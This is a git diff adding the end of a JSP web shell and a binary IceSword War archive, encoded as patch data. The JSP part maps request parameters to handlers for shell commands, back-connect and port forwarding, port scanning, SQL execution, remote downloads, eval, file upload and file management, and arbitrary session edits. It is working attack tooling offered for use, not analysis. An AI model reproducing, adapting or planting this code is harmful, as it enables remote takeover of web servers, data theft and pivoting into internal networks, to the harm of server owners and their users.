+				} catch (Exception e) {
+					throw e ;
+				}
+			}
+		}
+		//Session Manager
+		private static class SmInvoker extends DefaultInvoker {
+			public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+				try {
+						String type = request.getParameter("type");
+						PrintWriter out = response.getWriter();
+						if (type.equals("update")) {
+							String name = request.getParameter("name");
+							String value = request.getParameter("value");
+							JSession.setAttribute(name,value);
+							JSession.setAttribute(MSG,"Update/Add Attribute Success !");
+						} else if (type.equals("delete")) {
+							String name = request.getParameter("name");
+							JSession.removeAttribute(name);
+							JSession.setAttribute(MSG,"Remove Attribute Success !");
+						}
+						((Invoker)ins.get("vother")).invoke(request,response,JSession);
+				} catch (Exception e) {
+					
+					throw e ;
+				}
+			}
+		}
+	
+	static{
+		ins.put("script",new ScriptInvoker());
+		ins.put("before",new BeforeInvoker());
+		ins.put("after",new AfterInvoker());
+		ins.put("deleteBatch",new DeleteBatchInvoker());
+		ins.put("clipboard",new ClipBoardInvoker());
+		ins.put("vPortScan",new VPortScanInvoker());
+		ins.put("portScan",new PortScanInvoker());
+		ins.put("vConn",new VConnInvoker());
+		ins.put("dbc",new DbcInvoker());
+		ins.put("executesql",new ExecuteSQLInvoker());
+		ins.put("vLogin",new VLoginInvoker());
+		ins.put("login",new LoginInvoker());
+		ins.put("filelist", new FileListInvoker());
+		ins.put("logout",new LogoutInvoker());
+		ins.put("upload",new UploadInvoker());
+		ins.put("copy",new CopyInvoker());
+		ins.put("bottom",new BottomInvoker());
+		ins.put("vCreateFile",new VCreateFileInvoker());
+		ins.put("vEdit",new VEditInvoker());
+		ins.put("createFile",new CreateFileInvoker());
+		ins.put("vEditProperty",new VEditPropertyInvoker());
+		ins.put("editProperty",new EditPropertyInvoker());
+		ins.put("vs",new VsInvoker());
+		ins.put("shell",new ShellInvoker());
+		ins.put("down",new DownInvoker());
+		ins.put("vd",new VdInvoker());
+		ins.put("downRemote",new DownRemoteInvoker());
+		ins.put("index",new IndexInvoker());
+		ins.put("mkdir",new MkDirInvoker());
+		ins.put("move",new MoveInvoker());
+		ins.put("removedir",new RemoveDirInvoker());
+		ins.put("packBatch",new PackBatchInvoker());
+		ins.put("pack",new PackInvoker());
+		ins.put("unpack",new UnPackInvoker());
+		ins.put("vmp",new VmpInvoker());
+		ins.put("vbc",new VbcInvoker());
+		ins.put("backConnect",new BackConnectInvoker());
+		ins.put("jspEnv",new JspEnvInvoker());
+		ins.put("smp",new SmpInvoker());
+		ins.put("mapPort",new MapPortInvoker());
+		ins.put("top",new TopInvoker());
+		ins.put("vso",new VOnLineShellInvoker());
+		ins.put("online",new OnLineInvoker());
+		ins.put("enter",new EnterInvoker());
+		ins.put("export",new ExportInvoker());
+		ins.put("ev",new EvalInvoker());
+		ins.put("eu",new EvalUploadInvoker());
+		ins.put("vother",new VOtherInvoker());
+		ins.put("sm",new SmInvoker());
+		ins.put("vExport",new VExport2FileInvoker());
+		ins.put("vPack",new VPackConfigInvoker());
+		ins.put("reflect",new ReflectInvoker());
+		ins.put("portBack",new PortBackInvoker());
+	}
+%>
+<%
+	try {
+		String o = request.getParameter("o");
+		if (Util.isEmpty(o)) {
+			if (session.getAttribute(SESSION_O) == null)
+				o = "index";
+			else {
+				o = session.getAttribute(SESSION_O).toString();
+				session.removeAttribute(SESSION_O);
+			}
+		}
+		Object obj = ins.get(o);
+		if (obj == null) {
+			response.sendRedirect(SHELL_NAME);
+		} else {
+			Invoker in = (Invoker)obj;
+			if (in.doBefore()) {
+				String path = request.getParameter("folder");
+				if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null)
+					session.setAttribute(CURRENT_DIR,path);
+				((Invoker)ins.get("before")).invoke(request,response,session);
+				((Invoker)ins.get("script")).invoke(request,response,session);
+				((Invoker)ins.get("top")).invoke(request,response,session);
+			}
+			in.invoke(request,response,session);
+			if (!in.doAfter()) {
+				return;
+			}else{
+				((Invoker)ins.get("bottom")).invoke(request,response,session);
+				((Invoker)ins.get("after")).invoke(request,response,session);
+			}
+		}					
+	} catch (Exception e) {
+		Object msg = session.getAttribute(MSG);
+		if (msg != null) {
+			Util.outMsg(out,(String)msg);
+			session.removeAttribute(MSG);
+		}
+		if (e.toString().indexOf("ClassCastException") != -1) {
+			Util.outMsg(out,MODIFIED_ERROR + BACK_HREF);
+		}
+		ByteArrayOutputStream bout = new ByteArrayOutputStream();
+		e.printStackTrace(new PrintStream(bout));
+		session.setAttribute(CURRENT_DIR,SHELL_DIR);
+		Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","<br/>"),"left");
+		bout.close();
+		out.flush();
+		((Invoker)ins.get("bottom")).invoke(request,response,session);
+		((Invoker)ins.get("after")).invoke(request,response,session);
+	}
+%>
diff --git a/other/icesword.war b/other/icesword.war
new file mode 100644
index 0000000000000000000000000000000000000000..dc8f1e343e7c3084b503f14f20a1e1903a541aa7
GIT binary patch
literal 11470
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
